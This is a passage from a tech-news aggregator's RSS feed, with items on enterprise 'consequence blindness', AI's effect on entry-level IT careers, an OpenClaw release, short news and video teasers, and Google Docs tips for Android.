<p><em>This article was originally published in February 2025 and most recently updated in July 2026.</em></p>



<h3 class="wp-block-heading">More on Microsoft 365 Copilot:</h3>



<ul class="wp-block-list">
<li><a href="https://www.computerworld.com/article/4036013/how-it-leaders-unlock-productivity-with-microsoft-365-copilot.html">How IT leaders unlock productivity with Microsoft 365 Copilot</a></li>



<li><a href="https://www.computerworld.com/article/4110646/building-end-to-end-workflows-with-microsoft-365-copilot.html">Building end-to-end workflows with Microsoft 365 Copilot</a></li>



<li><a href="https://www.computerworld.com/article/3479705/how-to-use-microsoft-copilot-for-writing-in-microsoft-365-word-outlook-onenote.html">Microsoft Copilot can boost your writing in Word, Outlook, and OneNote — here’s how</a></li>



<li><a href="https://www.computerworld.com/article/4119411/11-cool-things-copilot-can-do-in-excel.html">11 cool things Copilot can do in Excel</a></li>



<li><a href="https://www.computerworld.com/article/4022584/9-ways-copilot-can-turbocharge-onenote.html">9 ways Copilot can turbocharge OneNote</a></li>



<li><a href="https://www.computerworld.com/article/4067372/how-to-curb-hallucinations-in-copilot-and-other-genai-tools.html">How to curb hallucinations in Copilot (and other genAI tools)</a></li>
</ul>



<p></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Addressing consequence blindness]]></title>
<description><![CDATA[Enterprises do not suffer from a lack of oversight. They have dashboards, risk forums, architecture boards, vendor reviews, cyber controls, transformation offices, capital committees, regulatory programs, audit findings, service reports and enough status updates to make even the most patient exec...]]></description>
<link>https://tsecurity.de/de/3640868/it-security-nachrichten/addressing-consequence-blindness/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640868/it-security-nachrichten/addressing-consequence-blindness/</guid>
<pubDate>Thu, 02 Jul 2026 13:05:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Enterprises do not suffer from a lack of oversight. They have dashboards, risk forums, architecture boards, vendor reviews, cyber controls, transformation offices, capital committees, regulatory programs, audit findings, service reports and enough status updates to make even the most patient executive reach for stronger coffee.</p>



<p>The issue is not that senior leaders fail to recognize activity, but that they often miss understanding where the consequences will lead next.</p>



<p>A technology issue does not stay within technology. A control weakness does not stay within compliance. A vendor failure does not stay within procurement. A data-quality gap does not stay within a data office. A cyber incident does not stay within security. An AI initiative does not stay within innovation.</p>



<p>It extends to customer trust, regulatory exposure, operating capacity, capital allocation, scarce talent, legal risk, vendor obligations, brand credibility and strategic freedom.</p>



<p>That is why every enterprise now needs a consequence layer: a connected way for senior executives to see what else moves when something changes. Not another dashboard, system of record or management ritual.</p>



<h2 class="wp-block-heading">Local failures no longer stay local</h2>



<p>Enterprise failures are often described by where they start rather than by where they end. Knight Capital remains one of the clearest examples because the entire episode unfolded in less than an hour. According to the <a href="https://www.sec.gov/files/litigation/admin/2013/34-70694.pdf" rel="nofollow">SEC’s order on Knight Capital</a>, a software deployment issue generated more than 4 million executions across 154 stocks in about 45 minutes, leaving the firm with roughly $3.5 billion in net long positions, $3.15 billion in net short positions and a $460 million loss. A technical failure became a capital, regulatory and strategic event.</p>



<p>That is not just a trading story. It is a warning about enterprise coupling. A code path, a deployment gap, market access, execution speed and weak controls were linked. The enterprise did not see the connection until the market did.</p>



<p>TSB Bank offers a modernization version of the same lesson. In 2018, TSB migrated customer and corporate services to a new platform. The data itself migrated successfully, but the platform immediately experienced technical failures that disrupted branch, telephone, online and mobile banking. The <a href="https://www.fca.org.uk/news/press-releases/tsb-fined-48m-operational-resilience-failings" rel="nofollow">FCA later announced</a> that TSB had been fined £48.65 million for operational resilience failings tied to the upgrade program.</p>



<p>TD Bank shows the control version. In 2024, <a href="https://www.fincen.gov/news/news-releases/fincen-assesses-record-13-billion-penalty-against-td-bank" rel="nofollow">FinCEN assessed a record $1.3 billion penalty</a> against TD Bank and imposed a four-year independent monitorship tied to anti-money-laundering failures. The <a href="https://www.occ.gov/news-issuances/news-releases/2024/nr-occ-2024-116.html" rel="nofollow">OCC separately imposed</a> a $450 million civil money penalty and a growth restriction. A control issue became an enterprise constraint.</p>



<p>The original issue is rarely the whole issue. It is just where the consequence first became visible.</p>



<h2 class="wp-block-heading">The formal view is not the whole enterprise</h2>



<p>Most large organizations are still managed through functional silos. Technology has its systems. Finance has its systems. Risk has its systems. Compliance has its systems. Operations has its systems. Business units have their workflows, spreadsheets, local tools and local truths. That is not inherently a flaw. At enterprise scale, different teams need different systems because they do different work.</p>



<p>The danger is pretending those boundaries reflect how consequences behave. They do not.</p>



<p>A strategic initiative may appear healthy in the formal portfolio view. The milestone is green. The budget is approved. The steering committee is comfortable. Meanwhile, the same data teams, security reviewers, infrastructure groups, vendors, release windows, compliance resources and business experts may be committed elsewhere.</p>



<p>The project is green in one system. The capacity is gone in another. The dependency is buried in a third.</p>



<p>This is where the consequence layer matters. It does not replace the systems teams already use. It sits above them, connecting the enterprise logic across them. It does not need to own every workflow or transaction. It needs to understand how work, capacity, funding, timing, dependencies, vendors, risks, controls and value interact.</p>



<p>A consequence layer limited to the strategic portfolio is incomplete by design. The constraint that undermines the strategy may lie in operations, cyber, vendor management, data quality, regulatory remediation, customer service, finance or shared technical capacity. If those signals are outside the model, leadership may get a clean view of the portfolio and still miss the enterprise reality.</p>



<h2 class="wp-block-heading">Dashboards show position. They rarely show blast radius</h2>



<p>Dashboards matter. Reporting matters. Governance matters. But visibility is not the same as control over consequences.</p>



<p>A dashboard may show that a major platform program is delayed, a vendor SLA has slipped, a cyber risk has increased or a customer metric has deteriorated. What it often fails to show is the blast radius.</p>



<p>Which commitments are now less realistic? Which teams are about to be overdrawn? Which customer journeys are affected? Which regulatory dates are at risk? Which cost assumptions no longer hold? Which downstream initiatives now depend on heroic recovery?</p>



<p>Silicon Valley Bank is a stark reminder that assumptions can collapse with extraordinary force. The <a href="https://www.fdic.gov/news/speeches/2023/spmar2723.html" rel="nofollow">FDIC reported</a> that by the end of March 9, 2023, $42 billion in deposits had left the bank. A balance-sheet assumption, depositor concentration, social amplification, liquidity exposure and digital banking behavior converged into a real-time institutional crisis. The point is not that every enterprise faces an SVB-style event. The point is that assumptions are no longer safely confined to one domain.</p>



<h2 class="wp-block-heading">Resilience work is already pointing to the consequence layer</h2>



<p>Regulators are pushing financial institutions toward this realization, although they use different vocabulary. The <a href="https://www.bankofengland.co.uk/-/media/boe/files/prudential-regulation/supervisory-statement/2021/ss121-march-22.pdf" rel="nofollow">Bank of England’s operational resilience guidance</a> expects firms to identify important business services and test whether they can remain within impact tolerances under severe but plausible scenarios. <a href="https://www.esma.europa.eu/press-news/esma-news/european-supervisory-authorities-designate-critical-ict-third-party-providers" rel="nofollow">DORA applies a similar logic</a> across the EU financial sector, including oversight of critical third-party ICT providers whose failures could affect operational resilience.</p>



<p>This is not just compliance work. It is a map of enterprise consequences.</p>



<p>Important business services, third-party dependencies, recovery tolerances, cyber scenarios, critical operations and service continuity are not side documents for risk teams. They are the organization’s wiring diagram.</p>



<p>If that wiring diagram sits apart from technology roadmaps, investment commitments, capacity constraints, AI demand, vendor strategy and customer obligations, the enterprise has only partial control.</p>



<p>This also connects to the project and transformation profession. <a href="https://www.pmi.org/learning/agile/manifesto-for-enterprise-agility" rel="nofollow">PMI’s Manifesto for Enterprise Agility</a> frames enterprise agility around adapting at scale without losing coherence, and <a href="https://www.pmi.org/learning/thought-leadership/boosting-business-acumen" rel="nofollow">PMI’s 2025 Pulse of the Profession</a> emphasizes the shift from tactical troubleshooting to strategic value creation. A consequence layer helps the enterprise adapt without losing the thread between commitment, capacity, risk and value.</p>



<p>The CIO may see the systems. The CRO may see the control exposure. The CFO may see the funding and capital implications. The COO may see the operating strain. The business may see customer and revenue impact. The consequence does not care which executive owns the first signal. It travels anyway.</p>



<h2 class="wp-block-heading">AI adds new consequence paths</h2>



<p>AI does not reduce consequence complexity. It increases it.</p>



<p>Every AI use case creates new enterprise edges: data readiness, model risk, explainability, privacy, security, cloud cost, workflow redesign, legal exposure, human adoption, vendor reliance and value measurement. The risk is not only hallucination or misuse. It is untested assumptions presented with executive polish.</p>



<p>A leadership team can approve an AI ambition in one room and discover months later that the real constraint lives in model-risk capacity, data lineage, customer consent, cloud architecture or operational absorption. That is not an AI problem alone. It is the absence of a consequence layer wearing an AI badge.</p>



<p>AI value depends on technology, yes, but also on risk, legal, finance, operations, HR, customer experience and the business model itself.</p>



<h2 class="wp-block-heading">Manual consequence tracking will not scale</h2>



<p>This cannot be solved through another standing meeting. The people involved are not the problem. They know their domains, the risks, the workarounds and where the bodies are buried, sometimes in a spreadsheet named something like “final_final_v9.” The issue is scale.</p>



<p>Every serious enterprise move now touches systems, people, controls, vendors, data, security, funding, customers, regulators and operating tolerance. The number of interactions grows faster than any manual review process can keep up with.</p>



<p>If a regulatory program accelerates, which modernization work gets displaced? If AI demand expands, which data, legal, cyber, architecture, privacy and model-risk teams are now consumed? If a core migration slips, which cost-takeout, customer migration, vendor and operating assumptions move with it? If funding tightens, which initiatives still make sense and which business cases are quietly eroding?</p>



<p>Those questions require a consequence layer. Not to make the call. To make the call more honest. The math should not replace judgment. But judgment without connected consequence math becomes too dependent on meetings, memory, optimism and politics.</p>



<h2 class="wp-block-heading">The lesson extends well beyond banking</h2>



<p>CrowdStrike made the ecosystem lesson visible across industries. Microsoft estimated that the July 2024 update affected 8.5 million Windows devices, less than one percent of all Windows machines. Microsoft also wrote that the incident demonstrated “the interconnected nature” of the technology ecosystem. Small percentage. Large consequence. The details are in Microsoft’s <a href="https://blogs.microsoft.com/blog/2024/07/20/helping-our-customers-through-the-crowdstrike-outage/" rel="nofollow">CrowdStrike outage update</a>.</p>



<p>Change Healthcare showed a similar pattern in healthcare. The <a href="https://www.aha.org/change-healthcare-cyberattack-underscores-urgent-need-strengthen-cyber-preparedness-individual-health-care-organizations-and" rel="nofollow">American Hospital Association described</a> the February 2024 cyberattack as disrupting health care operations on an unprecedented national scale, endangering patient access, disrupting clinical and eligibility operations and threatening provider solvency. A separate <a href="https://www.financialresearch.gov/briefs/files/OFRBrief-24-05-change-healthcare-cyberattack.pdf" rel="nofollow">Office of Financial Research brief</a> described the disruption as triggering a “medical sector liquidity event.”</p>



<p>Manufacturing sees the same pattern when a supplier delay hits sequencing, inventory, commitments, margin and revenue. Retail sees it when demand or data-quality issues move from merchandising into warehouses, stores, pricing and customer trust. Utilities see it when grid delays affect reliability targets, field crews, regulators and outage response.</p>



<p>Different industries. Same structure. The original issue is local. The consequence is not.</p>



<h2 class="wp-block-heading">From visibility to consequence</h2>



<p>The dashboard era trained executives to ask, “What is the status?” The consequence layer asks a harder question: “What else moves because this moved?”</p>



<p>That question now sits at the center of modernization, operational resilience, AI governance, third-party risk, cyber preparedness, regulatory credibility, customer trust and enterprise value.</p>



<p>The next leadership advantage depends not on generating more activity metrics, but on proactively detecting consequence movements early—before they escalate into losses, outages, fines, stranded investments, customer harm or the loss of strategic freedom.</p>



<p>Every serious enterprise has systems of record. What many still lack is a system of consequence.</p>



<p>Not another dashboard or workflow tool. A consequence layer gives senior leaders a way to test what happens when priorities, capacity, timing, funding, risk, vendors and dependencies pull in opposite directions.</p>



<p>That is the missing space between strategy and execution. In a complex enterprise, the original issue is rarely the whole issue. It is just where the consequence first became visible.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How AI automation is reshaping the IT leadership pipeline]]></title>
<description><![CDATA[In the wake of AI, the early-talent job market is in decline across all jobs and industries, with a 10% drop since 2021, according to a recent report from SAP. When isolated for the top 10 most common entry level job titles, including software engineer, customer support, and data analyst, job ope...]]></description>
<link>https://tsecurity.de/de/3640731/it-nachrichten/how-ai-automation-is-reshaping-the-it-leadership-pipeline/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640731/it-nachrichten/how-ai-automation-is-reshaping-the-it-leadership-pipeline/</guid>
<pubDate>Thu, 02 Jul 2026 12:03:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>In the wake of AI, the early-talent job market is in decline across all jobs and industries, with a 10% drop since 2021, <a href="https://www.sap.com/documents/2026/05/ccd1609f-507f-0010-bca6-c68f7e60039b.html" rel="nofollow">according to a recent report from SAP</a>. When isolated for the top 10 most common entry level job titles, including software engineer, customer support, and data analyst, job openings declined 35% from 2024 to 2025.</p>



<p>AI is already impacting entry-level and task-based roles, leaving the question of what will happen to the future talent pipeline of IT leadership.</p>



<p>“Our research suggests that organizations create a gap in their <a href="https://www.cio.com/article/4165232/whats-holding-back-enterprise-ai-shortage-of-talent-cios-say.html?utm=hybrid_search">future leadership pipeline</a> if they continue reducing entry-level hiring without rethinking how early-career talent develops,” says Autumn Krauss, chief scientist for Future of Work Research Lab at SAP SuccessFactors. “Historically, people built business acumen, technical expertise, and leadership skills through the first few years of their careers. As AI becomes embedded in workflows, organizations need to be intentional about creating new ways for employees to build those skills.”</p>



<p>Companies have traditionally followed hierarchal processes that encourage employees to advance up the career ladder via promotions, with many taking a leadership path to IT director, CIO, or CTO. However, this process has always relied on workers starting with entry-level and routine work to create a natural first step for future leaders. But now, more companies are automating the work that entry-level and mid-level employees used to cut their teeth on, says Maruf Ahmed, CEO of IT staffing and consulting company Dexian.</p>



<p>For example, a junior engineer might start in QA and testing on the technical side, getting hands-on experience with how systems work. As they progress in their career, that knowledge continues to stack, creating future leaders who deeply understand the technology and the business.</p>



<p>“Maintaining a strong succession path starts with being honest about what AI removed from someone’s development, and then being intentional about replacing it,” says Ahmed. “Senior leaders need to spend more time actively teaching, and people need exposure to complex decisions earlier in their careers. Day-to-day work used to build that foundation on its own, and it doesn’t anymore.”</p>



<h2 class="wp-block-heading">Redesigning jobs for AI and leading in uncertainty</h2>



<p>As many have discovered, it’s not always easy to decipher quality AI outputs, especially as the technology has become renowned for <a href="https://www.cio.com/article/228199/the-12-biggest-issues-it-faces-today.html?utm=hybrid_search">hallucinating results</a>. Current and future IT leaders need the foundational knowledge to have confidence when evaluating AI outputs, especially if they’re expecting employees to use AI. The most valuable leaders are the ones comfortable making decisions with incomplete information, and who can make calls on the spot about automated processes, no matter what may arise.</p>



<p>“We often see AI doesn’t stay contained in one function for long,” Ahmed adds. “Once an organization automates in one area, there’s an expectation to extend that more broadly, and leaders who built their careers inside a specific function are suddenly being asked to weigh in on AI use in areas they’ve never directly managed.”</p>



<p>According to recent research from <a href="https://www.deloitte.com/cz-sk/en/services/consulting/research/the-state-of-ai-in-the-enterprise.html" rel="nofollow">Deloitte</a>, 84% of companies haven’t done the work to redesign jobs around AI despite high expectations for automation, and 36% expect at least 10% of their jobs to be fully automated within a year, and 82% say within three years. Even with those results, fewer than half are making significant adjustments to talent strategies, with 53% saying they’re simply focusing on educating employees to raise AI fluency.</p>



<p>That leaves entry-level workers and those in task-aligned roles in somewhat unknown territory as automation replaces time-consuming tasks, and managers shift to overseeing human-AI teams. Deloitte points to a potential shift toward flatter structures, with more than half of businesses considering pod-based or non-hierarchal models, while 16% have already started to make a shift.</p>



<p>IT leaders will likely find themselves relying more on others in the company to make judgment calls around AI, opening communication and transparency as job roles evolve and structures begin to flatten. With AI adoption happening at a rapid pace, organizations need to evaluate how it’ll impact talent and leadership structures, and what the future of leadership will look like with automation.</p>



<h2 class="wp-block-heading">Investing in early talent to maintain a leadership pathway</h2>



<p>IT leaders need to avoid the trap of treating AI adoption as a technology rollout rather than a workforce development project, says Ahmed. Leaders will continue to invest heavily in new tools, services, hardware, and technology, and then expect employees to become self-taught on these platforms in their downtime.</p>



<p>“Our research found that leaders don’t often feel confident or equipped with the skills to lead that level of transformation. Instead, organizations often fall back on the tactic of giving employees AI tools and expecting them to figure out how best to use them on their own,” says Krauss.</p>



<p>If current IT leaders feel unequipped to lead through AI transformation, it’s imperative companies step back and reevaluate training and future leadership talent pools. Investments in AI should be weighed alongside the necessary investments for employee upskilling and training, and to redefine long-standing organizational structures.</p>



<p>Investment in early <a href="https://www.cio.com/article/251060/employee-retention-10-strategies-for-retaining-top-talent.html?utm=hybrid_search">talent development programs</a> can also be beneficial for tackling potential future leadership gaps left by AI adoption, with 86% of employees saying that an early talent program helped set them up for career success, according to the SAP report. But despite the beneficial nature of such programs, only 32% of early talent report participating in an early talent program, and 49% say their organization doesn’t offer one. Plus, only 35% of early talent employees say they’ve been given sufficient transparency into which roles in their organization may be automated in the future, while one in three express concerns their job may one day cease to exist due to AI advancements.</p>



<p>“As roles change, organizations need to give employees a clearer picture of where opportunities are emerging and what skills will be most important,” says Krauss. “Many employees are already uncertain about how technology will affect their careers, and that uncertainty can make it harder to stay engaged. People are more likely to invest in their growth when they see a path forward. That visibility is becoming increasingly important.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2026.7.1-beta.1]]></title>
<description><![CDATA[openclaw 2026.7.1-beta.1]]></description>
<link>https://tsecurity.de/de/3640189/downloads/v202671-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640189/downloads/v202671-beta1/</guid>
<pubDate>Thu, 02 Jul 2026 07:17:08 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>openclaw 2026.7.1-beta.1</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake Values Kill Company Trust]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 Core values only build trust when they're reflected in everyday decisions. A company that claims to be "people first" but consistently acts otherwise creates a gap between its messaging and reality.

That disconnect weakens credib...]]></description>
<link>https://tsecurity.de/de/3639689/it-security-video/fake-values-kill-company-trust/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639689/it-security-video/fake-values-kill-company-trust/</guid>
<pubDate>Wed, 01 Jul 2026 23:02:44 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/RjcffurkXos?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Core values only build trust when they're reflected in everyday decisions. A company that claims to be "people first" but consistently acts otherwise creates a gap between its messaging and reality.<br />
<br />
That disconnect weakens credibility with employees, leaders, and candidates. Organizations don't have to share the same priorities, but they do need to be honest about them. Clear alignment between stated values and actual behavior is what creates trust over time.<br />
<br />
If you compared your company's public values with its day-to-day decisions, would they tell the same story—or reveal a very different culture?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#Leadership #CompanyCulture #Trust #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HP's OmniBook 3 16" beats everything else on the budget laptop market right now — if only the pricing were easier to predict]]></title>
<description><![CDATA[HP's OmniBook 3 16" is often one of the best budget laptops on the market, but its volatile pricing makes my recommendation harder to predict. In any case, it delivers incredible battery life and snappy performance, two features you always want in a PC. Here's my honest opinion after a couple of ...]]></description>
<link>https://tsecurity.de/de/3638990/windows-tipps/hps-omnibook-3-16-beats-everything-else-on-the-budget-laptop-market-right-now-if-only-the-pricing-were-easier-to-predict/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638990/windows-tipps/hps-omnibook-3-16-beats-everything-else-on-the-budget-laptop-market-right-now-if-only-the-pricing-were-easier-to-predict/</guid>
<pubDate>Wed, 01 Jul 2026 17:28:51 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[HP's OmniBook 3 16" is often one of the best budget laptops on the market, but its volatile pricing makes my recommendation harder to predict. In any case, it delivers incredible battery life and snappy performance, two features you always want in a PC. Here's my honest opinion after a couple of weeks of regular use.]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-07-01 15h : 12 posts]]></title>
<description><![CDATA[12 posts were published in the last hour 12:34 : CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks 12:34 : OpenClaw: risks for agent users and how to mitigate them 12:34 : The SOC Files: ScreenConnect masked as…
Read more →
The post IT Security News Hourly Summary 2026-07-01 15h :...]]></description>
<link>https://tsecurity.de/de/3638665/it-security-nachrichten/it-security-news-hourly-summary-2026-07-01-15h-12-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638665/it-security-nachrichten/it-security-news-hourly-summary-2026-07-01-15h-12-posts/</guid>
<pubDate>Wed, 01 Jul 2026 15:38:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>12 posts were published in the last hour 12:34 : CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks 12:34 : OpenClaw: risks for agent users and how to mitigate them 12:34 : The SOC Files: ScreenConnect masked as…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-07-01-15h-12-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-07-01-15h-12-posts/">IT Security News Hourly Summary 2026-07-01 15h : 12 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw: risks for agent users and how to mitigate them]]></title>
<description><![CDATA[Researching OpenClaw vulnerabilities, malicious skills and other security issues with the popular agent, and providing tips on how to mitigate them. This article has been indexed from Securelist Read the original article: OpenClaw: risks for agent users and how to…
Read more →
The post OpenClaw: ...]]></description>
<link>https://tsecurity.de/de/3638538/it-security-nachrichten/openclaw-risks-for-agent-users-and-how-to-mitigate-them/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638538/it-security-nachrichten/openclaw-risks-for-agent-users-and-how-to-mitigate-them/</guid>
<pubDate>Wed, 01 Jul 2026 14:35:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Researching OpenClaw vulnerabilities, malicious skills and other security issues with the popular agent, and providing tips on how to mitigate them. This article has been indexed from Securelist Read the original article: OpenClaw: risks for agent users and how to…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/openclaw-risks-for-agent-users-and-how-to-mitigate-them/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/openclaw-risks-for-agent-users-and-how-to-mitigate-them/">OpenClaw: risks for agent users and how to mitigate them</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw: risks for agent users and how to mitigate them]]></title>
<description><![CDATA[Researching OpenClaw vulnerabilities, malicious skills and other security issues with the popular agent, and providing tips on how to mitigate them.]]></description>
<link>https://tsecurity.de/de/3638271/malware-trojaner-viren/openclaw-risks-for-agent-users-and-how-to-mitigate-them/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638271/malware-trojaner-viren/openclaw-risks-for-agent-users-and-how-to-mitigate-them/</guid>
<pubDate>Wed, 01 Jul 2026 13:19:13 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Researching OpenClaw vulnerabilities, malicious skills and other security issues with the popular agent, and providing tips on how to mitigate them.]]></content:encoded>
</item>
<item>
<title><![CDATA[12 handy hidden Google Docs tricks for Android]]></title>
<description><![CDATA[Few apps are as essential to mobile productivity as the humble word processor. I think I’ve probably spent a solid seven years of my life staring at Google Docs on one device or another at this point, and those minutes only keep ticking up with practically every passing day.



While we can’t do ...]]></description>
<link>https://tsecurity.de/de/3638021/it-nachrichten/12-handy-hidden-google-docs-tricks-for-android/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638021/it-nachrichten/12-handy-hidden-google-docs-tricks-for-android/</guid>
<pubDate>Wed, 01 Jul 2026 11:47:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Few apps are as essential to mobile productivity as the humble word processor. I think I’ve probably spent a solid seven years of my life staring at Google Docs on one device or another at this point, and those minutes only keep ticking up with practically every passing day.</p>



<p>While we can’t do much about the need to gaze at that word-filled white screen, what we <em>can </em>do is learn how to make every moment spent within Docs count — and in the <a href="https://play.google.com/store/apps/details?id=com.google.android.apps.docs.editors.docs&amp;hl=en_US" target="_blank" rel="noreferrer noopener">Docs Android app</a>, specifically, there are some pretty spectacular tucked-away time-savers just waiting to be discovered.</p>



<p>Make a mental note of these advanced shortcuts and options, and put ’em to good use the next time you find yourself staring at Docs on your own device.</p>



<h2 class="wp-block-heading">Google Docs Android feature #1: Smarter document organization</h2>



<p>We’ll save the best for, erm, first — ’cause the easily overlooked feature we’re kickin’ things off with can save you some serious time and make your mobile editing experience significantly easier.</p>



<p>After all, dealing with a complex document from your phone can be a real hassle. Who wants to waste time scrolling through endless-seeming screens to find the section of info you need to read, edit, or work on at any given moment?</p>



<p>I sure as heckfire don’t — and if you remember to use Docs’ out-of-the-way Outline option, you’ll never have to do it again, either. While viewing or editing any document with any sort of headers in it (be they actual header-formatted text or even just bolded section titles), tap the three-dot menu icon in Docs’ upper-right corner and then select “Document Outline.”</p>



<p>And by golly, wouldya look at that?</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/01-google-docs-android-outline.jpg?quality=50&amp;strip=all&amp;w=996" alt="Google Docs Android: Document outline" class="wp-image-4191233" width="996" height="1024" sizes="auto, (max-width: 996px) 100vw, 996px"><figcaption class="wp-element-caption">An automatic document outline is never out of reach in the Docs Android app.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Jumping to any part of the document is now just a single tap away.</p>



<p><strong>[Psst: Love shortcuts? My </strong><a href="https://theintelligence.com/shortcut-ai/" target="_blank" rel="noreferrer noopener"><strong>Android Shortcut Supercourse</strong></a><strong> will teach you tons of time-saving tricks for every single part of your smartphone experience. </strong><a href="https://theintelligence.com/shortcut-ai/"><strong>Sign up now for free</strong></a><strong>!]</strong></p>



<h2 class="wp-block-heading">Google Docs Android feature #2: Instant tab access</h2>



<p>Speaking of organization, in that same section of the in-document three-dot menu resides an easily overlooked option called “Document tabs.”</p>



<p>Tap it, and you can then see, manage, and move among any tabs created within the document for added organization — just like in the Docs desktop interface.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/02-google-docs-android-tabs.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Tabs" class="wp-image-4191231" width="1024" height="1022" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Who knew?! Your Google Docs tabs are now accessible within the Docs Android app as well.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Yes, please — and thank you.</p>



<h2 class="wp-block-heading">Google Docs Android feature #3: Easier Word integration</h2>



<p>When you’re working with clients, colleagues, or even camels who for some reason prefer the Microsoft editing ecosystem, you don’t have to do much to bridge that gap. The Docs Android app can already open and allow you to edit Word files, without any work — and with one simple flip of a switch, you can <em>create</em> new files in the .DOCX format just as easily.</p>



<p>To find the feature, you’ve gotta back out of any actual documents and get onto the main Docs screen — the screen with the search box at the top and all your documents listed out beneath it. Tap the three-line menu icon in the upper-left corner of that screen and head into the Settings section of that main menu. There, you should see the very switch we need:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/03a-google-docs-android-create-word-files.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Create Word files" class="wp-image-4191225" width="1024" height="537" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Tick one toggle, and you can then create native Word files within the Docs Android app anytime.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Flip that into the on position, then back yourself out to the main Docs screen. The next time you tap the plus icon in that area’s lower-right corner, you should see “New Word file” show up as an option right above the default “New Docs file” command.</p>



<p>And just as a reminder, if you ever want to save an <em>existing</em> Docs file into the .DOCX format, you can do that, too: Tap the three-dot menu icon while editing a document, select “Share &amp; export,” then select “Save As” and choose the “Word (.docx)” option.</p>


